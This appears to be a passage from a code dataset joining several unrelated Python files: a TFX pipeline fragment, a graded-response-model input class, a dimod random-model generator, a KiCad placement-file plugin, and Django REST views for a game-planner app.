        metrics_specs=[
            tfma.MetricsSpec(
                metrics=[
                    tfma.MetricConfig(class_name='ExampleCount')
                ],
                thresholds={
                    'accuracy': tfma.MetricThreshold(
                        value_threshold=tfma.GenericValueThreshold(
                            lower_bound={'value': 0.5}),
                        change_threshold=tfma.GenericChangeThreshold(
                            direction=tfma.MetricDirection.HIGHER_IS_BETTER,
                            absolute={'value': -1e-10}))
                }
            )
        ],
        slicing_specs=[tfma.SlicingSpec()],
    )
    evaluator = tfx.components.Evaluator(
        examples=example_gen.outputs['examples'],
        model=trainer.outputs['model'],
        baseline_model=model_resolver.outputs['model'],
        eval_config=eval_config)
    components.append(evaluator)

    # Pushes the model iff the Evaluator blessed it.
    pusher_args = {
        'model': trainer.outputs['model'],
        'model_blessing': evaluator.outputs['blessing'],
    }
    if ai_platform_serving_args is not None:
        pusher_args['custom_config'] = {
            tfx.extensions.google_cloud_ai_platform.experimental
            .PUSHER_SERVING_ARGS_KEY:
                ai_platform_serving_args
        }
        pusher = tfx.extensions.google_cloud_ai_platform.Pusher(**pusher_args)
    else:
        pusher_args['push_destination'] = tfx.proto.PushDestination(
            filesystem=tfx.proto.PushDestination.Filesystem(
                base_directory=serving_model_dir))
        pusher = tfx.components.Pusher(**pusher_args)
    components.append(pusher)

    return tfx.dsl.Pipeline(
        pipeline_name=pipeline_name,
        pipeline_root=pipeline_root,
        components=components,
        metadata_connection_config=metadata_connection_config,
    )
| StarcoderdataPython |
3252750 | from dataclasses import dataclass
from typing import Optional
import numpy as np
import pandas as pd
from .meta import GRMMeta
@dataclass()
class GRMInputs:
    # Numeric inputs for a graded response model (GRM).
    # ``response_array`` holds one row per observation as
    # [item_code, person_code, response]; ``level_array`` (optional) holds
    # one level code per item, aligned with ``meta.item_category``.
    meta: GRMMeta
    response_array: np.ndarray
    level_array: Optional[np.ndarray] = None
    @classmethod
    def from_df(cls,
                response_df: pd.DataFrame,
                level_df: Optional[pd.DataFrame] = None) -> "GRMInputs":
        """
        Build :class:`GRMInputs` from long-format data frames.
        :param response_df: columns=["item", "person", "response"]
        :param level_df: columns=["item", "level"]
        """
        ret = cls._from_response_df(response_df)
        if level_df is not None:
            ret._add_level(level_df)
        return ret
    @classmethod
    def _from_response_df(cls, response_df: pd.DataFrame) -> "GRMInputs":
        # Responses must be integers starting at 1; meta records the highest
        # observed response as the number of grades.
        assert "item" in response_df.columns
        assert "person" in response_df.columns
        assert "response" in response_df.columns
        assert np.issubdtype(response_df.response.dtype, np.integer)
        assert response_df.response.min() >= 1
        response_df = response_df.astype({"item": "category", "person": "category"})
        meta = GRMMeta(
            response_df.item.dtype,
            response_df.person.dtype,
            response_df.response.max()
        )
        # Encode items/persons via their categorical codes; columns are
        # [item_code, person_code, raw_response].
        response_array = np.c_[
            response_df.item.cat.codes.values,
            response_df.person.cat.codes.values,
            response_df.response.values
        ]
        return GRMInputs(meta, response_array)
    def _add_level(self, level_df: pd.DataFrame) -> None:
        # Attach one level code per item known to ``meta``; items missing
        # from ``level_df`` receive the placeholder level "_unknown".
        assert "item" in level_df.columns
        assert "level" in level_df.columns
        # NOTE(review): ``.unique().all()`` only checks that the unique item
        # values are truthy, not that items are unique — confirm intent.
        assert level_df.item.unique().all()
        # Left-merge onto the full item list so the result is aligned with
        # ``meta.item_category`` ordering.
        level_df = pd.merge(
            self.meta.item_category.categories.to_frame(name="item"),
            level_df
            .drop_duplicates(subset="item")
            .astype({"item": self.meta.item_category}),
            how="left"
        )
        level_df["level"] = level_df.level.fillna("_unknown").astype({"level": "category"})
        self.meta.level_category = level_df.level.dtype
        self.level_array = level_df.level.cat.codes.values
| StarcoderdataPython |
3326413 | <reponame>mullzhang/genqubo
import numpy as np
import numpy.random
from dimod.binary_quadratic_model import BinaryQuadraticModel
from dimod.decorators import graph_argument
@graph_argument('graph')
def normal(graph, vartype, loc=0.0, scale=1.0, cls=BinaryQuadraticModel,
           seed=None, zero_lbias=False):
    """Build a binary quadratic model with normally distributed random biases.

    Linear and quadratic biases and the offset are drawn from a normal
    distribution with mean ``loc`` and standard deviation ``scale``.

    Args:
        graph (int/tuple[nodes, edges]/list[edge]/:obj:`~networkx.Graph`):
            Graph to build the bqm on: an integer n (complete graph of size n),
            a (nodes, edges) pair, a list of edges, or a NetworkX graph.
        vartype (:class:`.Vartype`/str/set):
            Variable type of the model (SPIN or BINARY).
        loc (float, optional, default=0.0):
            Mean of the bias distribution.
        scale (float, optional, default=1.0):
            Standard deviation of the bias distribution; must be non-negative.
        cls (:class:`.BinaryQuadraticModel`):
            Binary quadratic model class to construct.
        seed (int, optional, default=None):
            Random seed; a fresh one is drawn when omitted.
        zero_lbias (bool, optional, default=False):
            When true, all linear biases are set to zero instead of sampled.

    Returns:
        :obj:`.BinaryQuadraticModel`
    """
    if seed is None:
        seed = np.random.randint(2**32, dtype=np.uint32)
    rng = np.random.RandomState(seed)
    variables, edges = graph
    position = {node: i for i, node in enumerate(variables)}
    if edges:
        irow, icol = zip(*((position[u], position[v]) for u, v in edges))
    else:
        irow, icol = (), ()
    # Draw order matters for reproducibility with a fixed seed:
    # linear biases first (skipped when zeroed), then quadratic, then offset.
    if zero_lbias:
        ldata = np.zeros(len(variables))
    else:
        ldata = rng.normal(loc, scale, size=len(variables))
    qdata = rng.normal(loc, scale, size=len(irow))
    offset = rng.normal(loc, scale)
    return cls.from_numpy_vectors(ldata, (irow, icol, qdata), offset, vartype,
                                  variable_order=variables)
| StarcoderdataPython |
88005 | import csv
import os
import pcbnew
import re
import wx
from decimal import Decimal, getcontext
from pathlib import Path
# Reference-designator prefixes that are never placed (test points, holes,
# graphics, etc.) and are therefore skipped in the placement output.
ref_ignore = ["TP", "T", "NT", "REF**", "G", "H"]
# original rotation db from:
# https://github.com/matthewlai/JLCKicadTools/blob/master/jlc_kicad_tools/cpl_rotations_db.csv
# Maps a regex over the KiCad footprint name to the rotation offset (degrees)
# needed so the part orientation matches JLC's feeder convention.
rotations = {
    "^SOT-223": 180,
    "^SOT-23": 180,
    "^SOT-353": 180,
    "^QFN-": 270,
    "^LQFP-": 270,
    "^TQFP-": 270,
    "^SOP-(?!18_)": 270,
    "^TSSOP-": 270,
    # "^DFN-": 270,
    "^SOIC-": 90,
    "^SOP-18_": 0,
    "^VSSOP-10_": 270,
    "^CP_EIA-3216-18_": 180,
    "^CP_Elec_8x10.5": 180,
    "^CP_Elec_6.3x7.7": 180,
    "^CP_Elec_8x6.7": 180,
    "^(.*?_|V)?QFN-(16|20|24|28|40)(-|_|$)": 270,
    "^MSOP-10_": 90,
    "^R_Array_Convex_4x0603": 90,
    "^XCVR_ESP32-WROVER-B": 270,
    "^PinSocket_1x(04|05)_P2.54mm_Vertical": 270,
    "Buzzer_MLT-8530_C94599": 0,
    "SW_Tactile_SPST_Angled_PTS645Vx58-2LFS": 180,
    "USB_C_Receptacle_HRO_TYPE-C-31-M-12": 180,
    "USB_Micro-B_Molex-105017-0001": 270,
}
# Maps a footprint-name regex to an (x, y) midpoint offset in millimetres,
# applied (after rotating into the part's frame) when the KiCad footprint
# origin differs from the JLC part origin.
midpoint_correction = {
    "^PinSocket_1x04_P2.54mm_Vertical": (Decimal(0), Decimal(-3.81)),
    "^PinSocket_1x05_P2.54mm_Vertical": (Decimal(0), Decimal(-5.08)),
    "^XCVR_ESP32-WROVER-B": (Decimal(0), Decimal(0.04)),
    "BarrelJack": (Decimal(-6.5), Decimal(0)),
    "^SW_SPST_HRO": (Decimal(0), Decimal(1.65)),
    "USB_C_Receptacle_HRO_TYPE-C-31-M-12": (Decimal(1.8), Decimal(0.65)),
    "SW_Tactile_SPST_Angled_PTS645Vx58-2LFS": (Decimal(2.2), Decimal(-1)),
}
#
# helper functions from https://docs.python.org/3/library/decimal.html
#
def pi():
    """Compute pi to the current decimal context precision.

    Evaluates a fast-converging series with two extra guard digits; the
    final unary plus rounds the result back to the caller's precision.

    >>> print(pi())
    3.141592653589793238462643383
    """
    ctx = getcontext()
    ctx.prec += 2  # guard digits for intermediate terms
    term = Decimal(3)
    total, prev = 3, 0
    num, num_step = 1, 0
    den, den_step = 0, 24
    while total != prev:
        prev = total
        num, num_step = num + num_step, num_step + 8
        den, den_step = den + den_step, den_step + 32
        term = (term * num) / den
        total += term
    ctx.prec -= 2
    return +total  # unary plus re-rounds to the restored precision
def cos(x):
    """Return the cosine of x as measured in radians.

    Uses the Taylor series, which is most accurate for small x; for larger
    values compute x = x % (2 * pi) first. Works for Decimal, float and
    complex inputs alike.

    >>> print(cos(Decimal('0.5')))
    0.8775825618903727161162815826
    >>> print(cos(0.5))
    0.87758256189
    >>> print(cos(0.5+0j))
    (0.87758256189+0j)
    """
    ctx = getcontext()
    ctx.prec += 2  # guard digits while summing
    total, prev = 1, 0
    power, factorial, sign = 1, 1, 1
    k = 0
    while total != prev:
        prev = total
        k += 2
        factorial *= k * (k - 1)
        power *= x * x
        sign = -sign
        total += power / factorial * sign
    ctx.prec -= 2
    return +total  # re-round to the restored precision
def sin(x):
    """Return the sine of x as measured in radians.

    Uses the Taylor series, which is most accurate for small x; for larger
    values compute x = x % (2 * pi) first. Works for Decimal, float and
    complex inputs alike.

    >>> print(sin(Decimal('0.5')))
    0.4794255386042030002732879352
    >>> print(sin(0.5))
    0.479425538604
    >>> print(sin(0.5+0j))
    (0.479425538604+0j)
    """
    ctx = getcontext()
    ctx.prec += 2  # guard digits while summing
    total, prev = x, 0
    power, factorial, sign = x, 1, 1
    k = 1
    while total != prev:
        prev = total
        k += 2
        factorial *= k * (k - 1)
        power *= x * x
        sign = -sign
        total += power / factorial * sign
    ctx.prec -= 2
    return +total  # re-round to the restored precision
class JLCSMTPlugin(pcbnew.ActionPlugin):
    """KiCad action plugin that writes JLCSMT CPL (component placement) CSV files."""
    def defaults(self):
        """Describe the plugin to pcbnew (name, category, toolbar icon)."""
        self.name = "Generate JLCSMT Placement Files"
        self.category = "Fabrication Outputs"
        self.description = "Generates the CPL placement files as expected by JLCSMT"
        self.show_toolbar_button = True
        self.icon_file_name = os.path.join(
            os.path.dirname(__file__), 'KiJLC_32x32.png')
    def Run(self):
        """Write <board>_cpl_top.csv and <board>_cpl_bot.csv next to the board file.

        Coordinates are relative to the aux origin, in millimetres, with the
        Y axis flipped (KiCad's internal Y grows downward). Footprints matching
        midpoint_correction get their origin shifted; footprints matching
        rotations get a rotation offset applied.
        """
        board = pcbnew.GetBoard()
        modules = board.GetFootprints() # was GetModules() but this does not work with KiCAD 6.0
        origin = board.GetDesignSettings().GetAuxOrigin()
        # Internal units are nanometres; divide by 1e6 for mm. Negative divisor
        # on Y flips the axis into the fab house's convention.
        origin_x = Decimal(origin.x) / Decimal(1000000)
        origin_y = Decimal(origin.y) / Decimal(-1000000)
        fn = Path(board.GetFileName()).with_suffix("")
        bot = open("{}_cpl_bot.csv".format(fn), "w", newline='')
        top = open("{}_cpl_top.csv".format(fn), "w", newline='')
        botw = csv.writer(bot, delimiter=',', quotechar='"',
                          quoting=csv.QUOTE_ALL)
        topw = csv.writer(top, delimiter=',', quotechar='"',
                          quoting=csv.QUOTE_ALL)
        hdr = ["Designator", "Mid X", "Mid Y", "Layer", "Rotation"]
        botw.writerow(hdr)
        topw.writerow(hdr)
        for mod in modules:
            # Skip non-placeable references (test points, holes, graphics...).
            skip = False
            ref = mod.GetReference()
            for prefix in ref_ignore:
                if ref.startswith(prefix):
                    skip = True
            if skip:
                continue
            pos = mod.GetPosition()
            rot = mod.GetOrientationDegrees()
            desc = mod.GetDescription()
            layer = board.GetLayerName(mod.GetLayer())
            mid_x = Decimal(pos[0]) / Decimal(1000000)
            mid_y = Decimal(pos[1]) / Decimal(-1000000)
            footprint = str(mod.GetFPID().GetLibItemName())
            print(footprint)
            # some library parts have a different origin than the JLC parts, try to correct it
            for exp in midpoint_correction:
                if re.match(exp, footprint):
                    px, py = midpoint_correction[exp]
                    # Rotate the correction vector by the part's orientation
                    # (standard 2D rotation) before applying it.
                    rad = Decimal(rot) * pi() / Decimal(180)
                    qx = cos(rad) * px - sin(rad) * py
                    qy = sin(rad) * px + cos(rad) * py
                    qx = qx.quantize(Decimal('0.001'))
                    qy = qy.quantize(Decimal('0.001'))
                    print(f"previous midpoint for {footprint} x: {mid_x}, y: {mid_y}; new x: {mid_x + qx}, y: {mid_y + qy}")
                    mid_x += qx
                    mid_y += qy
            # Apply the JLC feeder rotation offset for matching footprints.
            for exp in rotations:
                if re.match(exp, footprint):
                    new_rot = (rot + rotations[exp]) % 360
                    print(f"rotating {ref} ({footprint}): prev {rot}, new {new_rot}")
                    rot = new_rot
            x = str(mid_x - origin_x) + "mm"
            y = str(mid_y - origin_y) + "mm"
            if layer == "F.Cu":
                topw.writerow([ref, x, y, "top", rot])
            elif layer == "B.Cu":
                botw.writerow([ref, x, y, "bottom", rot])
        bot.close()
        top.close()
        wx.MessageBox("Placement files generated.",
                      'Done', wx.OK | wx.ICON_INFORMATION)
# Register the plugin with pcbnew so it appears under External Plugins.
JLCSMTPlugin().register()
| StarcoderdataPython |
3278470 | import re
from rest_framework import generics
from rest_framework import permissions
from rest_framework import exceptions
from rest_framework import status
from rest_framework.response import Response
from django.shortcuts import get_object_or_404
from django.contrib.auth.models import User
from django.db.models import Q
from django.utils import timezone
from game_planner_api.serializers import PlayerSerializer, GameSerializer, GameExSerializer, NotificationSerializer, FriendshipSerializer, GameParticipationRequestSerializer
from .models import Player, Game, NotificationType, Notification, Friendship, GameParticipationRequest
class IndirectModelMixin:
    """View mixin that resolves the object through an intermediate model.

    The URL kwarg is first looked up on ``indirect_model`` (e.g. User by
    username), and the resulting instance is then used as the value of
    ``indirect_lookup_field`` to fetch the actual object from the queryset
    (e.g. the Player whose ``user`` is that User).
    """
    # TODO: use GenericAPIView::super() instead of dupe code
    def get_object(self):
        """Return the object found via the indirect lookup, enforcing permissions."""
        queryset = self.filter_queryset(self.get_queryset())
        # Perform the lookup filtering.
        lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field
        assert lookup_url_kwarg in self.kwargs, (
            'Expected view %s to be called with a URL keyword argument '
            'named "%s". Fix your URL conf, or set the `.lookup_field` '
            'attribute on the view correctly.' %
            (self.__class__.__name__, lookup_url_kwarg)
        )
        filter_kwargs = {self.lookup_field: self.kwargs[lookup_url_kwarg]}
        # First hop: resolve the intermediate object (404 if missing).
        indirect_field = get_object_or_404(self.indirect_model, **filter_kwargs)
        # May raise a permission denied
        self.check_object_permissions(self.request, indirect_field)
        if indirect_field:
            # Second hop: resolve the target object keyed by the intermediate one.
            indirect_lookup = {self.indirect_lookup_field: indirect_field}
            obj = get_object_or_404(queryset, **indirect_lookup)
            # May raise a permission denied
            self.check_object_permissions(self.request, obj)
            return obj
class PlayerList(generics.ListAPIView):
    """Read-only list of all players."""
    queryset = Player.objects.all()
    serializer_class = PlayerSerializer
class PlayerDetail(IndirectModelMixin,
                   generics.RetrieveUpdateAPIView):
    """Retrieve or PATCH a single player, looked up via the User's username.

    Supported PATCH actions: ``remove_friend`` (remove {username} from the
    authenticated user's friends) and ``update_player`` (update the
    authenticated user's own name/email).
    """
    lookup_field = 'username'
    indirect_lookup_field = 'user'
    indirect_model = User
    queryset = Player.objects.all()
    serializer_class = PlayerSerializer

    # override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
    def put(self, request, *args, **kwargs):
        return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)

    def perform_update(self, serializer):
        request_json = self.request.data
        user = self.request.user
        action = request_json.get('action')
        # Authenticated user removes {username} as friend
        if action == "remove_friend":
            requester_player = Player.objects.get(user=user)
            user_to_remove = User.objects.get(username=self.kwargs['username'])
            player_to_remove = Player.objects.get(user=user_to_remove)
            are_friends = player_to_remove in requester_player.friends.all()
            if not are_friends:
                raise exceptions.NotFound(detail="You are not %s's friend." % self.kwargs['username'])
            requester_player.friends.remove(player_to_remove)
            # Remove "X accepted your friend request." notification from the requester if it hasn't been read yet
            notification = Notification.objects.filter(notification_type=NotificationType.ADDED_AS_FRIEND.value,
                                                       user=player_to_remove.user,
                                                       read=False)
            if notification:
                notification.delete()
            serializer.save()
        # Authenticated player updates his info.
        # BUG FIX: this must be `elif` — previously it was a separate `if`, so a
        # successful "remove_friend" fell through to the `else` below and raised
        # ParseError (HTTP 400) after the side effects had already been applied.
        elif action == "update_player":
            user_to_update = User.objects.get(username=self.kwargs['username'])
            if not user_to_update == user:
                raise exceptions.PermissionDenied()
            # BUG FIX: use .get() — the old code indexed request_json['first_name']
            # etc. unconditionally, raising KeyError when a field was omitted.
            first_name = request_json.get('first_name')
            last_name = request_json.get('last_name')
            email = request_json.get('email')
            if first_name is not None and len(first_name) > 30:
                raise exceptions.ParseError(detail="'first_name' must be a string with 30 characters or fewer.")
            if last_name is not None and len(last_name) > 150:
                raise exceptions.ParseError(detail="'last_name' must be a string with 150 characters or fewer.")
            if email and not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email):
                raise exceptions.ParseError(detail="Invalid 'email' address.")
            if first_name:
                user.first_name = first_name
            if last_name:
                user.last_name = last_name
            if email:
                user.email = email
            user.save()
        else:
            raise exceptions.ParseError()
class GameList(generics.ListAPIView):
    """List games visible to the requester: all public games, plus (when
    authenticated) games the user administers or participates in."""
    queryset = Game.objects.all()
    serializer_class = GameSerializer
    def get_queryset(self):
        """
        Excludes games that user does not have permission to see.
        """
        qs = super().get_queryset()
        filter_q = Q(private=False)
        if self.request.user and self.request.user.is_authenticated:
            user = self.request.user
            # Get player's games list
            player = Player.objects.get(user=user)
            filter_q = filter_q | Q(admin=user) | Q(players=player)
        # distinct() is required: the players join can yield duplicate rows.
        return qs.filter(filter_q).distinct()
class GameDetailPermission(permissions.BasePermission):
    """
    Public games can be seen by unauthenticated users
    Private games can only be seen by participating players or admin
    Games can be changed by game admin
    """
    def has_object_permission(self, request, view, obj):
        if request.method in permissions.SAFE_METHODS:
            # Public games are readable by anyone; private ones only by
            # the admin or a participating player.
            authorized = not obj.private
            if request.user and request.user.is_authenticated:
                player = Player.objects.get(user=request.user)
                is_admin = (request.user == obj.admin)
                participating = (player in obj.players.all())
                authorized = authorized or is_admin or participating
            return authorized
        # admin user can use non safe methods
        return obj.admin == request.user
class GameDetail(generics.RetrieveUpdateDestroyAPIView):
    """Retrieve, PATCH or delete a game.

    PATCH supports the actions ``add_player`` and ``remove_player``, each
    taking a ``username`` body parameter. Only the game admin may modify
    (enforced by GameDetailPermission).
    """
    lookup_field = 'game_id'
    queryset = Game.objects.all()
    serializer_class = GameExSerializer
    permission_classes = [GameDetailPermission]
    # override parent class put method so that HTTP PUT request returns 405 Method not allowed
    def put(self, request, *args, **kwargs):
        return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
    def perform_update(self, serializer):
        # Note: Conflict is defined later in this module; that is fine because
        # it is only looked up when this method runs, after module import.
        game = Game.objects.get(game_id=self.kwargs['game_id'])
        if 'action' in self.request.data and self.request.data['action'] == 'add_player' and 'username' in self.request.data:
            user_to_add = User.objects.filter(username=self.request.data['username'])
            if not user_to_add:
                raise exceptions.NotFound(detail="Player '%s' not found." % self.request.data['username'])
            player_to_add = Player.objects.get(user=user_to_add[0])
            if player_to_add in game.players.all():
                raise Conflict(detail="'%s' is already participating in '%s'." % (self.request.data['username'], game.name))
            game.players.add(player_to_add)
        elif 'action' in self.request.data and self.request.data['action'] == 'remove_player' and 'username' in self.request.data:
            user_to_remove = User.objects.filter(username=self.request.data['username'])
            if not user_to_remove:
                raise exceptions.NotFound(detail="Player '%s' not found." % self.request.data['username'])
            player_to_remove = Player.objects.get(user=user_to_remove[0])
            if not player_to_remove in game.players.all():
                raise Conflict(detail="'%s' is not participating in '%s'." % (self.request.data['username'], game.name))
            game.players.remove(player_to_remove)
        else:
            raise exceptions.ParseError()
class NotificationList(generics.ListAPIView):
    """List the authenticated user's notifications."""
    queryset = Notification.objects.all()
    serializer_class = NotificationSerializer

    def get_queryset(self):
        """
        Only show notifications of authenticated user.
        """
        qs = super().get_queryset()
        if self.request.user and self.request.user.is_authenticated:
            return qs.filter(user=self.request.user)
        # FIX: the old code implicitly returned None here. IsAuthenticated
        # normally blocks this path, but get_queryset must always return a
        # queryset — fall back to an empty one.
        return qs.none()

    permission_classes = [permissions.IsAuthenticated]
class NotificationDetailPermission(permissions.BasePermission):
    """Only the notification's owner may access it."""
    def has_object_permission(self, request, view, obj):
        return obj.user == request.user
class NotificationDetail(generics.RetrieveUpdateDestroyAPIView):
    """Retrieve, PATCH or delete a single notification.

    PATCH actions: ``mark_as_read`` (records the read timestamp once) and
    ``mark_as_unread`` (clears it).
    """
    lookup_field = 'id'
    queryset = Notification.objects.all()
    serializer_class = NotificationSerializer
    permission_classes = [permissions.IsAuthenticated, NotificationDetailPermission]
    # override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH and DELETE requests allowed)
    def put(self, request, *args, **kwargs):
        return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
    def perform_update(self, serializer):
        notification = Notification.objects.get(id=self.kwargs['id'])
        if not self.request.user == notification.user:
            raise exceptions.PermissionDenied()
        if 'action' in self.request.data and self.request.data['action'] == 'mark_as_read':
            # Preserve the original read timestamp: only set it the first time.
            if not notification.read_datetime:
                serializer.save(read=True,
                                read_datetime=timezone.now())
        elif 'action' in self.request.data and self.request.data['action'] == 'mark_as_unread':
            serializer.save(read=False,
                            read_datetime=None)
        else:
            raise exceptions.ParseError()
class Conflict(exceptions.APIException):
    """DRF exception that maps to HTTP 409 Conflict."""
    status_code = 409
    default_detail = 'Conflict'
    default_code = 'conflict'
class FriendshipList(generics.ListCreateAPIView):
    """List the authenticated user's friendships/friend requests, or create a
    new friend request (POST with ``username``).

    The optional ``type`` query parameter filters the list: ``incoming`` or
    ``outgoing`` pending requests, or ``active`` friendships; by default both
    pending and active rows involving the user are returned. A pending
    request is one whose ``state`` is null.
    """
    queryset = Friendship.objects.all()
    serializer_class = FriendshipSerializer
    permission_classes = [permissions.IsAuthenticated]
    def get_queryset(self):
        """
        Only show friend requests of authenticated user.
        """
        qs = super().get_queryset()
        if self.request.user and self.request.user.is_authenticated:
            user = self.request.user
            player = Player.objects.get(user=user)
            friendship_type = self.request.query_params.get('type', None)
            if friendship_type is not None:
                if friendship_type == "incoming":
                    return qs.filter(Q(request_to=player) & Q(state__isnull=True))
                elif friendship_type == "outgoing":
                    return qs.filter(Q(request_from=player) & Q(state__isnull=True))
                elif friendship_type == "active":
                    return qs.filter(((Q(request_to=player) | Q(request_from=player)) & Q(state="ACTIVE")))
            # Default: all pending requests plus all active friendships
            # involving this player.
            return qs.filter(((Q(request_to=player) | Q(request_from=player)) & Q(state__isnull=True)) | ((Q(request_to=player) | Q(request_from=player)) & Q(state="ACTIVE")))
    def perform_create(self, serializer):
        """Create a friend request to ``username`` and notify the recipient."""
        request_json = self.request.data
        user = self.request.user
        if not 'username' in request_json:
            raise exceptions.ParseError(detail="\"username\" body parameter missing.")
        requester_player = Player.objects.get(user=user)
        requested_user = User.objects.filter(username=request_json['username'])
        if not requested_user:
            raise exceptions.NotFound(detail="Player %s not found." % request_json['username'])
        requested_player = Player.objects.get(user=requested_user[0])
        if requester_player == requested_player:
            raise exceptions.PermissionDenied(detail="A player cannot add himself as a friend.")
        # Reject when a pending request already exists in either direction.
        outgoing_request = Friendship.objects.filter(request_from=requester_player, request_to=requested_player, state__isnull=True)
        incoming_request = Friendship.objects.filter(request_from=requested_player, request_to=requester_player, state__isnull=True)
        active_request = outgoing_request or incoming_request
        if active_request:
            raise Conflict(detail="An active friend request already exists between those users.")
        already_friends = requested_player in list(requester_player.friends.all())
        if already_friends:
            raise Conflict(detail="Players are already friends with eachother.")
        request_datetime = timezone.now()
        # Notify the requested player; the shared timestamp links the
        # notification to this friend request for later cleanup.
        notification = Notification(notification_type=NotificationType.FRIEND_REQ.value,
                                    creation_datetime=request_datetime,
                                    sender=requester_player.user,
                                    user=requested_player.user)
        notification.save()
        serializer.save(request_from=requester_player,
                        request_to=requested_player,
                        request_datetime=request_datetime)
class FriendshipDetailPermission(permissions.BasePermission):
    """Only the two players involved in the friendship may access it."""
    def has_object_permission(self, request, view, obj):
        # FIX: the old code re-fetched both users by username (two extra DB
        # queries) before comparing; Django model equality is pk-based, so we
        # can compare the related users directly.
        return request.user == obj.request_from.user or request.user == obj.request_to.user
class FriendshipDetail(generics.RetrieveUpdateDestroyAPIView):
    """Retrieve, PATCH or delete a single friendship.

    PATCH actions on a pending request: ``cancel`` (sender only), ``accept``
    and ``decline`` (recipient only). DELETE on an active friendship removes
    the friend relation. Related notifications are created/cleaned up to
    stay consistent with the friendship state.
    """
    lookup_field = 'id'
    queryset = Friendship.objects.all()
    serializer_class = FriendshipSerializer
    permission_classes = [permissions.IsAuthenticated, FriendshipDetailPermission]
    # override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
    def put(self, request, *args, **kwargs):
        return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
    def perform_update(self, serializer):
        friend_request = Friendship.objects.get(id=self.kwargs['id'])
        # Only the involved users may act, and only while the request is
        # still pending (state unset).
        if not ((self.request.user == friend_request.request_from.user or self.request.user == friend_request.request_to.user) and not friend_request.state):
            raise exceptions.PermissionDenied()
        if self.request.user == friend_request.request_from.user and 'action' in self.request.data and self.request.data['action'] == 'cancel':
            # Remove the recipient's unread friend-request notification, if any
            # (matched by the request's creation timestamp).
            notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
                                                       creation_datetime=friend_request.request_datetime,
                                                       user=friend_request.request_to.user,
                                                       read=False)
            if notification:
                notification.delete()
            serializer.save(state="CANCELED",
                            action_taken_datetime=timezone.now())
        elif self.request.user == friend_request.request_to.user and 'action' in self.request.data and self.request.data['action'] == 'accept':
            request_datetime = timezone.now()
            # Add to player's friends list and send notification to new friend
            player = Player.objects.get(user=self.request.user)
            player.friends.add(friend_request.request_from)
            notification = Notification(notification_type=NotificationType.ADDED_AS_FRIEND.value,
                                        creation_datetime=request_datetime,
                                        sender=player.user,
                                        user=friend_request.request_from.user)
            notification.save()
            # Mark friend request notification as read if it still is unread
            friend_request_notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
                                                                      creation_datetime=friend_request.request_datetime,
                                                                      user=friend_request.request_to.user,
                                                                      read=False)
            if friend_request_notification:
                friend_request_notification = Notification.objects.get(pk=friend_request_notification[0].pk)
                friend_request_notification.read = True
                friend_request_notification.read_datetime = request_datetime
                friend_request_notification.save()
            # Update friend_request state and save datetime of action_taken
            serializer.save(state="ACTIVE",
                            action_taken_datetime=request_datetime)
        elif self.request.user == friend_request.request_to.user and 'action' in self.request.data and self.request.data['action'] == 'decline':
            request_datetime = timezone.now()
            # Mark friend request notification as read if it still is unread
            friend_request_notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
                                                                      creation_datetime=friend_request.request_datetime,
                                                                      user=friend_request.request_to.user,
                                                                      read=False)
            if friend_request_notification:
                friend_request_notification = Notification.objects.get(pk=friend_request_notification[0].pk)
                friend_request_notification.read = True
                friend_request_notification.read_datetime = request_datetime
                friend_request_notification.save()
            # Update friend_request state and save datetime of action_taken
            serializer.save(state="DECLINED",
                            action_taken_datetime=request_datetime)
        else:
            raise exceptions.ParseError()
    """
    TODO: let client DELETE friendships using /friendships/{username} instead of /friendships/{id}
    """
    def perform_destroy(self, instance):
        """Unfriend: remove the relation, clean up notifications, delete the row."""
        # Remove player from friends in the Player model
        user = self.request.user
        requester_player = Player.objects.get(user=user)
        friend_request = Friendship.objects.get(id=self.kwargs['id'])
        # Only an ACTIVE friendship can be deleted (pending ones are canceled
        # or declined via PATCH instead).
        if not friend_request.state == "ACTIVE":
            raise exceptions.PermissionDenied()
        if friend_request.request_from == requester_player:
            player_to_remove = friend_request.request_to
        else:
            player_to_remove = friend_request.request_from
        requester_player.friends.remove(player_to_remove)
        # Remove "X accepted your friend request." notification from the requester if it hasn't been read yet
        notification = Notification.objects.filter(notification_type=NotificationType.ADDED_AS_FRIEND.value,
                                                   user=player_to_remove.user,
                                                   read=False)
        if notification:
            notification.delete()
        # Delete active Friendship instance
        instance.delete()
class GameParticipationRequestList(generics.ListCreateAPIView):
    """List pending game participation requests visible to the user, or create
    one (POST with ``game_id``)."""
    queryset = GameParticipationRequest.objects.all()
    serializer_class = GameParticipationRequestSerializer
    permission_classes = [permissions.IsAuthenticated]
    def get_queryset(self):
        """
        Only show game participation requests of games that authenticated user is administering.
        """
        qs = super().get_queryset()
        if self.request.user and self.request.user.is_authenticated:
            user = self.request.user
            player = Player.objects.get(user=user)
            # Pending requests either addressed to a game this user admins,
            # or sent by this user.
            return qs.filter((Q(request_to_game__admin=user) | Q(request_from=player)) & Q(state__isnull=True))
    def perform_create(self, serializer):
        """Create a participation request for ``game_id`` and notify the game admin."""
        request_json = self.request.data
        user = self.request.user
        if not 'game_id' in request_json:
            raise exceptions.ParseError(detail="'game_id' body parameter missing.")
        player = Player.objects.get(user=user)
        game = get_object_or_404(Game, game_id=request_json['game_id'])
        if player.user == game.admin:
            raise exceptions.PermissionDenied(detail="A game admin cannot request participation to said game.")
        active_request = GameParticipationRequest.objects.filter(request_from=player, request_to_game=game, state__isnull=True)
        if active_request:
            raise Conflict(detail="An active request already exists from this user.")
        participating = player in game.players.all()
        if participating:
            raise Conflict(detail="Already participating.")
        request_datetime = timezone.now()
        # Notify the admin; the shared timestamp ties the notification to this
        # request for later cleanup.
        notification = Notification(notification_type=NotificationType.PARTICIPATION_REQ.value,
                                    creation_datetime=request_datetime,
                                    sender=user,
                                    game=game,
                                    user=game.admin)
        notification.save()
        serializer.save(request_from=player,
